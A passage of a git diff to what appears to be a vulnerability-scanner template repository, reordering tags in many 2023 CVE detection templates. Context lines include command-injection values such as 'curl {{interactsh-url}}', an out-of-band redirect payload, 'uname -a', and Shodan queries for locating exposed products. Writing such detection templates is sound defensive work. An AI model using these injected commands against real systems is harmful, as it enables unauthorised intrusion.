cve2023,cve,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market variables: str: '{{rand_int(100000, 999999)}}' diff --git a/http/cves/2023/CVE-2023-0602.yaml b/http/cves/2023/CVE-2023-0602.yaml index 6db9d03933..836509eb4c 100644 --- a/http/cves/2023/CVE-2023-0602.yaml +++ b/http/cves/2023/CVE-2023-0602.yaml @@ -24,7 +24,7 @@ info: vendor: johnniejodelljr product: twittee_text_tweet framework: wordpress - tags: cve,cve2023,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet,johnniejodelljr + tags: cve2023,cve,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet,johnniejodelljr http: - raw: diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index c2df32c495..1a66f58d12 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -27,7 +27,7 @@ info: vendor: wp-slimstat product: slimstat_analytics framework: wordpress - tags: wpscan,cve,cve2023,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated + tags: cve2023,cve,wpscan,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index 5a50e34cb1..a28b675a4b 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -30,7 +30,7 @@ info: vendor: fortra product: goanywhere_managed_file_transfer shodan-query: http.favicon.hash:1484947000 - tags: cve,cve2023,rce,goanywhere,oast,kev,fortra + tags: cve2023,cve,rce,goanywhere,oast,kev,fortra http: - raw: diff --git a/http/cves/2023/CVE-2023-0777.yaml b/http/cves/2023/CVE-2023-0777.yaml index fe2f7c089c..3c0351e7e4 100644 --- a/http/cves/2023/CVE-2023-0777.yaml +++ b/http/cves/2023/CVE-2023-0777.yaml @@ -26,7 +26,7 @@ info: product: modoboa shodan-query: html:"Modoboa" fofa-query: body="Modoboa" - tags: huntr,packetstorm,modoboa,default-login + tags: cve2023,cve,huntr,packetstorm,modoboa,default-login http: - raw: diff --git a/http/cves/2023/CVE-2023-0900.yaml b/http/cves/2023/CVE-2023-0900.yaml index 8d7186acfb..b235ff79f8 100644 --- a/http/cves/2023/CVE-2023-0900.yaml +++ b/http/cves/2023/CVE-2023-0900.yaml @@ -25,7 +25,7 @@ info: product: pricing_table_builder framework: wordpress publicwww-query: "wp-content/plugins/ap-pricing-tables-lite" - tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart + tags: cve2023,cve,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart http: - raw: diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml index d9bee30df3..796441ccf4 100644 --- a/http/cves/2023/CVE-2023-0942.yaml +++ b/http/cves/2023/CVE-2023-0942.yaml @@ -29,7 +29,7 @@ info: vendor: artisanworkshop product: japanized_for_woocommerce framework: wordpress - tags: cve2023,woocommerce-for-japan,wp,wpscan,wordpress,authenticated,cve,xss,woocommerce,plugin,artisanworkshop + tags: cve2023,cve,woocommerce-for-japan,wp,wpscan,wordpress,authenticated,xss,woocommerce,plugin,artisanworkshop http: - raw: diff --git a/http/cves/2023/CVE-2023-0947.yaml b/http/cves/2023/CVE-2023-0947.yaml index ecfd98d9fa..764b877ee1 100644 --- a/http/cves/2023/CVE-2023-0947.yaml +++ b/http/cves/2023/CVE-2023-0947.yaml @@ -24,7 +24,7 @@ info: vendor: flatpress product: flatpress shodan-query: http.favicon.hash:-1189292869 - tags: huntr,cve,cve2023,lfi,flatpress,listing + tags: cve,cve2023,huntr,lfi,flatpress,listing http: - method: GET diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml index 329fa4bd69..1020b9095c 100644 --- a/http/cves/2023/CVE-2023-0948.yaml +++ b/http/cves/2023/CVE-2023-0948.yaml @@ -27,7 +27,7 @@ info: vendor: artisanworkshop product: japanized_for_woocommerce framework: wordpress - tags: wpscan,cve,cve2023,xss,woocommerce-for-japan,wordpress,wp-plugin,wp,authenticated,artisanworkshop + tags: cve,cve2023,wpscan,xss,woocommerce-for-japan,wordpress,wp-plugin,wp,authenticated,artisanworkshop http: - raw: diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml index a00fb37d39..845ad78838 100644 --- a/http/cves/2023/CVE-2023-0968.yaml +++ b/http/cves/2023/CVE-2023-0968.yaml @@ -29,7 +29,7 @@ info: vendor: kibokolabs product: watu_quiz framework: wordpress - tags: wordpress,cve,cve2023,wp,wp-plugin,xss,watu,authenticated,wpscan,kibokolabs + tags: cve2023,cve,wordpress,wp,wp-plugin,xss,watu,authenticated,wpscan,kibokolabs http: - raw: diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml index bdc16af457..aff13b36d0 100644 --- a/http/cves/2023/CVE-2023-1020.yaml +++ b/http/cves/2023/CVE-2023-1020.yaml @@ -26,7 +26,7 @@ info: vendor: wp_live_chat_shoutbox_project product: wp_live_chat_shoutbox framework: wordpress - tags: wpscan,cve,cve2023,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat,wp_live_chat_shoutbox_project + tags: cve2023,cve,wpscan,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat,wp_live_chat_shoutbox_project http: - raw: diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 97e1c1b391..515c64d79c 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -29,7 +29,7 @@ info: vendor: gnpublisher product: gn_publisher framework: wordpress - tags: wp-plugin,wordpress,gn-publisher,authenticated,cve2023,wp,xss,wpscan,cve,gnpublisher + tags: cve2023,cve,wp-plugin,wordpress,gn-publisher,authenticated,wp,xss,wpscan,gnpublisher http: - raw: diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index d51c003f30..5184c0d775 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -30,7 +30,7 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - tags: mlflow,oss,lfi,huntr,cve,cve2023,intrusive,lfprojects + tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects http: - raw: diff --git a/http/cves/2023/CVE-2023-1408.yaml b/http/cves/2023/CVE-2023-1408.yaml index 763d48294a..50957a1764 100644 --- a/http/cves/2023/CVE-2023-1408.yaml +++ b/http/cves/2023/CVE-2023-1408.yaml @@ -25,7 +25,7 @@ info: product: video_list_manager framework: wordpress publicwww-query: /wp-content/plugins/video-list-manager/ - tags: wpscan,cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project + tags: cve,cve2023,wpscan,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project http: - raw: diff --git a/http/cves/2023/CVE-2023-1434.yaml b/http/cves/2023/CVE-2023-1434.yaml index 0999450bfd..ec8cffb459 100644 --- a/http/cves/2023/CVE-2023-1434.yaml +++ b/http/cves/2023/CVE-2023-1434.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 1 shodan-query: title:"Odoo" - tags: cve,cve2023,odoo,xss + tags: cve2023,cve,odoo,xss http: - method: GET diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index b70fba36db..be5d20a6f4 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -29,7 +29,7 @@ info: vendor: jeecg product: jeecg-boot shodan-query: http.favicon.hash:1380908726 - tags: cve,cve2023,jeecg,sqli + tags: cve2023,cve,jeecg,sqli http: - raw: diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index 9d7fe8783e..f31dbd0940 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -26,7 +26,7 @@ info: vendor: evilmartians product: imgproxy shodan-query: "Server: imgproxy" - tags: huntr,cve,cve2023,imgproxy,xss,svg,evilmartians + tags: cve,cve2023,huntr,imgproxy,xss,svg,evilmartians http: - method: GET diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index ea72fffae6..503b37ad92 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -30,7 +30,7 @@ info: product: web_appliance shodan-query: title:"Sophos Web Appliance" fofa-query: title="Sophos Web Appliance" - tags: packetstorm,cve,cve2023,rce,sophos,oast,kev + tags: cve2023,cve,packetstorm,rce,sophos,oast,kev http: - raw: diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index f92521c25e..0a5285ec44 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -27,7 +27,7 @@ info: vendor: wago product: compact_controller_100_firmware shodan-query: html:"/wbm/" html:"wago" - tags: cve,cve2023,wago,rce + tags: cve2023,cve,wago,rce http: - raw: diff --git a/http/cves/2023/CVE-2023-1719.yaml b/http/cves/2023/CVE-2023-1719.yaml index 0b61cdcd84..ea3e27009c 100644 --- a/http/cves/2023/CVE-2023-1719.yaml +++ b/http/cves/2023/CVE-2023-1719.yaml @@ -23,7 +23,7 @@ info: vendor: bitrix24 product: bitrix24 shodan-query: html:"/bitrix/" - tags: cve,cve2023,bitrix,xss,bitrix24 + tags: cve2023,cve,bitrix,xss,bitrix24 http: - method: GET diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index fe350275d7..a7dc3fdea6 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -27,7 +27,7 @@ info: vendor: supportcandy product: supportcandy framework: wordpress - tags: cve,cve2023,sqli,wpscan,wordpress,supportcandy,unauth + tags: cve2023,cve,sqli,wpscan,wordpress,supportcandy,unauth http: - raw: diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index 029a238f98..4d6fff1d54 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -28,7 +28,7 @@ info: vendor: ninjaforms product: ninja_forms framework: wordpress - tags: wpscan,cve,cve2023,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss,ninjaforms + tags: cve2023,cve,wpscan,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss,ninjaforms http: - raw: diff --git a/http/cves/2023/CVE-2023-1880.yaml b/http/cves/2023/CVE-2023-1880.yaml index 3ef0346035..64abeeb44b 100644 --- a/http/cves/2023/CVE-2023-1880.yaml +++ b/http/cves/2023/CVE-2023-1880.yaml @@ -25,7 +25,7 @@ info: vendor: phpmyfaq product: phpmyfaq shodan-query: http.html:"phpmyfaq" - tags: huntr,cve,cve2023,xss,phpmyfaq + tags: cve2023,cve,huntr,xss,phpmyfaq http: - method: GET diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index c6f9594875..c4c85af0fa 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -27,7 +27,7 @@ info: vendor: pauple product: tablesome framework: wordpress - tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tablesome,pauple + tags: cve2023,cve,wpscan,wp,wp-plugin,wordpress,authenticated,xss,tablesome,pauple http: - raw: diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index 0b02d701e5..188d8d9281 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -30,7 +30,7 @@ info: vendor: cisco product: rv340_firmware fofa-query: app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P" - tags: cve,cve2023,xss,fileupload,cisco,unauth,routers,vpn,intrusive + tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusive variables: html_comment: "" # Random string as HTML comment to append in response body diff --git a/http/cves/2023/CVE-2023-2009.yaml b/http/cves/2023/CVE-2023-2009.yaml index 1459704d9e..adee86d6f0 100644 --- a/http/cves/2023/CVE-2023-2009.yaml +++ b/http/cves/2023/CVE-2023-2009.yaml @@ -24,7 +24,7 @@ info: vendor: pretty_url_project product: pretty_url framework: wordpress - tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss,pretty_url_project + tags: cve2023,cve,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss,pretty_url_project http: - raw: diff --git a/http/cves/2023/CVE-2023-20198.yaml b/http/cves/2023/CVE-2023-20198.yaml index d787e6a74d..f309a04173 100644 --- a/http/cves/2023/CVE-2023-20198.yaml +++ b/http/cves/2023/CVE-2023-20198.yaml @@ -32,7 +32,7 @@ info: product: ios_xe shodan-query: http.html_hash:1076109428 note: this template confirms vulnerable host with limited unauthenticated command execution, this does not include admin user creation + arbitrary cmd execution. - tags: cve,cve2023,kev,cisco,rce,auth-bypass + tags: cve2023,cve,kev,cisco,rce,auth-bypass variables: cmd: uname -a diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index 33efa3e5e0..23e0f98103 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -27,7 +27,7 @@ info: vendor: kunalnagar product: custom_404_pro framework: wordpress - tags: wpscan,cve,cve2023,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive,kunalnagar + tags: cve2023,cve,wpscan,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive,kunalnagar http: - raw: diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index 6d468e6800..6a19203a23 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -27,7 +27,7 @@ info: vendor: vmware product: aria_operations_for_logs shodan-query: title:"vRealize Log Insight" - tags: cve,cve2023,vmware,aria,rce,oast + tags: cve2023,cve,vmware,aria,rce,oast http: - raw: diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index fd30a040c2..58a53fd302 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -31,7 +31,7 @@ info: product: vrealize_network_insight shodan-query: title:"VMware vRealize Network Insight" fofa-query: title="VMware vRealize Network Insight" - tags: packetstorm,cve,cve2023,vmware,rce,msf,vrealize,insight,oast,kev + tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev variables: cmd: "curl {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index da207fb406..599aed612c 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -27,7 +27,7 @@ info: vendor: vmware product: vrealize_network_insight shodan-query: title:"VMware Aria Operations" - tags: cve,cve2023,vmware,aria,rce,authenticated,oast + tags: cve2023,cve,vmware,aria,rce,authenticated,oast http: - raw: diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index e8ab151af0..426dbc8428 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -28,7 +28,7 @@ info: vendor: vmware product: vrealize_network_insight shodan-query: title:"VMware Aria Operations" - tags: cve,cve2023,vmware,aria,disclosure,authenticated,rce,oast,intrusive + tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive variables: payload: location='http://{{interactsh-url}}' diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml index ac9888b620..b72902901e 100644 --- a/http/cves/2023/CVE-2023-2122.yaml +++ b/http/cves/2023/CVE-2023-2122.yaml @@ -25,7 +25,7 @@ info: vendor: 10web product: image_optimizer framework: wordpress - tags: wpscan,cve,cve2023,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated,10web + tags: cve2023,cve,wpscan,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated,10web http: - raw: diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index 9a9a2393a0..0d480dc76d 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: purchase_order_management_system_project product: purchase_order_management_system - tags: cve,cve2023,sqli,purchase-order-management-system,purchase_order_management_system_project + tags: cve2023,cve,sqli,purchase-order-management-system,purchase_order_management_system_project http: - method: GET diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index 2196464883..2bedb97a39 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -28,7 +28,7 @@ info: vendor: aajoda product: aajoda_testimonials framework: wordpress - tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,authenticated,aajoda + tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,authenticated,aajoda http: - raw: diff --git a/http/cves/2023/CVE-2023-22232.yaml b/http/cves/2023/CVE-2023-22232.yaml index bbb6d5ea8b..639d63912a 100644 --- a/http/cves/2023/CVE-2023-22232.yaml +++ b/http/cves/2023/CVE-2023-22232.yaml @@ -18,7 +18,7 @@ info: max-request: 1 verified: true shodan-query: title:"Adobe Connect" - tags: cve,cve2023,adobe,lfd,download + tags: cve2023,cve,adobe,lfd,download http: - method: GET diff --git a/http/cves/2023/CVE-2023-2224.yaml b/http/cves/2023/CVE-2023-2224.yaml index f7fca2e30c..ddcfec09de 100644 --- a/http/cves/2023/CVE-2023-2224.yaml +++ b/http/cves/2023/CVE-2023-2224.yaml @@ -24,7 +24,7 @@ info: vendor: 10web product: seo framework: wordpress - tags: wpscan,packetstorm,cve,cve2023,wp,wordpress,wp-plugin,xss,seo,10web,authenticated + tags: cve2023,cve,wpscan,packetstorm,wp,wordpress,wp-plugin,xss,seo,10web,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index dae21cda72..659fee57e0 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -31,7 +31,7 @@ info: product: kubepi shodan-query: html:"kubepi" fofa-query: "kubepi" - tags: cve,cve2023,kubepi,k8s,exposure,fit2cloud + tags: cve2023,cve,kubepi,k8s,exposure,fit2cloud http: - raw: diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index b3cb588467..4a40915378 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -31,7 +31,7 @@ info: product: kubeoperator shodan-query: html:"KubeOperator" fofa-query: app="KubeOperator" - tags: cve,cve2023,kubeoperator,k8s,kubeconfig,exposure,fit2cloud + tags: cve2023,cve,kubeoperator,k8s,kubeconfig,exposure,fit2cloud http: - method: GET diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml index 050a315ff4..aa169be9a2 100644 --- a/http/cves/2023/CVE-2023-22515.yaml +++ b/http/cves/2023/CVE-2023-22515.yaml @@ -27,7 +27,7 @@ info: vendor: atlassian product: confluence_data_center fofa-query: app="ATLASSIAN-Confluence" - tags: cve,cve2023,confluence,auth-bypass,kev,intrusive,atlassian + tags: cve2023,cve,confluence,auth-bypass,kev,intrusive,atlassian variables: username: "{{rand_base(10)}}" password: "{{rand_base(10)}}" diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml index 8661dbb139..337af946b5 100644 --- a/http/cves/2023/CVE-2023-2252.yaml +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -16,7 +16,7 @@ info: metadata: verified: true max-request: 2 - tags: wpscan,cve,cve2023,lfi,directorist,wordpress,wp-plugin,wp,authenticated + tags: cve2023,cve,wpscan,lfi,directorist,wordpress,wp-plugin,wp,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index f38e22ed0a..047affd3b6 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -29,7 +29,7 @@ info: vendor: securepoint product: unified_threat_management shodan-query: title:"Securepoint UTM" - tags: utm,leak,memory,packetstorm,cve,cve2023,securepoint + tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint http: - raw: diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml index f9ce667785..5b07ac8abb 100644 --- a/http/cves/2023/CVE-2023-2272.yaml +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -28,7 +28,7 @@ info: vendor: tiempo product: tiempo framework: wordpress - tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tiempocom,tiempo + tags: cve,cve2023,wpscan,wp,wp-plugin,wordpress,authenticated,xss,tiempocom,tiempo http: - raw: diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 88b3471559..92417adb43 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -30,7 +30,7 @@ info: vendor: art_gallery_management_system_project product: art_gallery_management_system fofa-query: title="Art Gallery Management System" - tags: packetstorm,cve,cve2023,art,gallery,xss,art_gallery_management_system_project + tags: cve2023,cve,packetstorm,art,gallery,xss,art_gallery_management_system_project http: - method: GET diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index 0232bbf663..13b637458f 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -30,7 +30,7 @@ info: product: solarview_compact_firmware shodan-query: http.html:"SolarView Compact" fofa-query: body="SolarView Compact" && title="Top" - tags: packetstorm,cve,cve2023,solarview,rce,contec + tags: cve,cve2023,packetstorm,solarview,rce,contec variables: cmd: "echo+CVE-2023-23333|rev" diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index adec14054e..6704b27468 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -29,7 +29,7 @@ info: vendor: strangerstudios product: paid_memberships_pro framework: wordpress - tags: paid-memberships-pro,cve2023,wordpress,tenable,packetstorm,wp-plugin,sqli,cve,wp,strangerstudios + tags: cve2023,cve,paid-memberships-pro,wordpress,tenable,packetstorm,wp-plugin,sqli,wp,strangerstudios http: - raw: diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index eae5a8facf..4861baa4a9 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -29,7 +29,7 @@ info: vendor: sandhillsdev product: easy_digital_downloads framework: wordpress - tags: easy-digital-downloads,unauth,cve,wpscan,wordpress,wp,wp-plugin,cve2023,sqli,tenable,sandhillsdev + tags: cve,cve2023,easy-digital-downloads,unauth,wpscan,wordpress,wp,wp-plugin,sqli,tenable,sandhillsdev http: - raw: diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml index c98ef0e30b..0640bbeefa 100644 --- a/http/cves/2023/CVE-2023-23491.yaml +++ b/http/cves/2023/CVE-2023-23491.yaml @@ -25,7 +25,7 @@ info: product: quick_event_manager framework: wordpress publicwww-query: "/wp-content/plugins/quick-event-manager" - tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager,fullworksplugins + tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager,fullworksplugins http: - method: GET diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml index df02391efc..3b0f5b75f6 100644 --- a/http/cves/2023/CVE-2023-23492.yaml +++ b/http/cves/2023/CVE-2023-23492.yaml @@ -28,7 +28,7 @@ info: vendor: idehweb product: login_with_phone_number framework: wordpress - tags: login-with-phonenumber,wordpress,wp,wp-plugin,xss,tenable,cve,cve2023,idehweb + tags: cve2023,cve,login-with-phonenumber,wordpress,wp,wp-plugin,xss,tenable,idehweb http: - method: GET diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 1764f47de5..355ec94bfe 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -29,7 +29,7 @@ info: product: mlflow shodan-query: http.title:"mlflow" fofa-query: app="MLflow" - tags: cve,cve2023,lfi,huntr,mlflow,oss,intrusive,lfprojects + tags: cve2023,cve,lfi,huntr,mlflow,oss,intrusive,lfprojects variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index c0f9b58bf6..8cffb10115 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -27,7 +27,7 @@ info: vendor: joomla product: joomla\! shodan-query: html:"Joomla! - Open Source Content Management" - tags: cve,cve2023,joomla + tags: cve2023,cve,joomla http: - method: GET diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index 48582ade11..f825d7f296 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -31,7 +31,7 @@ info: product: obsidian shodan-query: title:"Plesk Obsidian" fofa-query: title="Plesk Obsidian" - tags: cve,cve2023,header,injection,plesk,obsidian + tags: cve2023,cve,header,injection,plesk,obsidian http: - method: GET diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index a3a2ed6100..8fc1bc4463 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml @@ -28,7 +28,7 @@ info: vendor: squidex.io product: squidex shodan-query: http.favicon.hash:1099097618 - tags: cve,cve2023,xss,squidex,cms,unauth,squidex.io + tags: cve2023,cve,xss,squidex,cms,unauth,squidex.io http: - method: GET diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index aa329437f2..6662d8542d 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -27,7 +27,7 @@ info: vendor: mojoportal product: mojoportal shodan-query: html:"mojoPortal" - tags: cves,cve2023,mojoportal,xss + tags: cve,cve2023,cves,mojoportal,xss http: - method: GET diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index 8c84e14da7..b167fc1eda 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -29,7 +29,7 @@ info: vendor: citrix product: gateway shodan-query: title:"Citrix Gateway" - tags: cve,cve2023,citrix,xss,adc + tags: cve2023,cve,citrix,xss,adc http: - method: GET diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index b8f3fd768a..1ea31d4089 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -28,7 +28,7 @@ info: vendor: citrix product: sharefile_storage_zones_controller shodan-query: title:"ShareFile Storage Server" - tags: cve,cve2023,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix + tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix variables: fileName: '{{rand_base(8)}}' diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index e41072b1b4..2e41e89b1c 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -27,7 +27,7 @@ info: vendor: phpipam product: phpipam shodan-query: html:"phpIPAM IP address management" - tags: cve,cve2023,xss,phpipam,authenticated + tags: cve2023,cve,xss,phpipam,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index 63f5bf60af..bc0725acce 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -28,7 +28,7 @@ info: vendor: pmb_project product: pmb shodan-query: http.favicon.hash:1469328760 - tags: cve,cve2023,redirect,pmb,pmb_project + tags: cve2023,cve,redirect,pmb,pmb_project http: - method: GET diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index 2bd95581a3..a0a81244be 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -28,7 +28,7 @@ info: vendor: pmb_project product: pmb shodan-query: http.favicon.hash:1469328760 - tags: 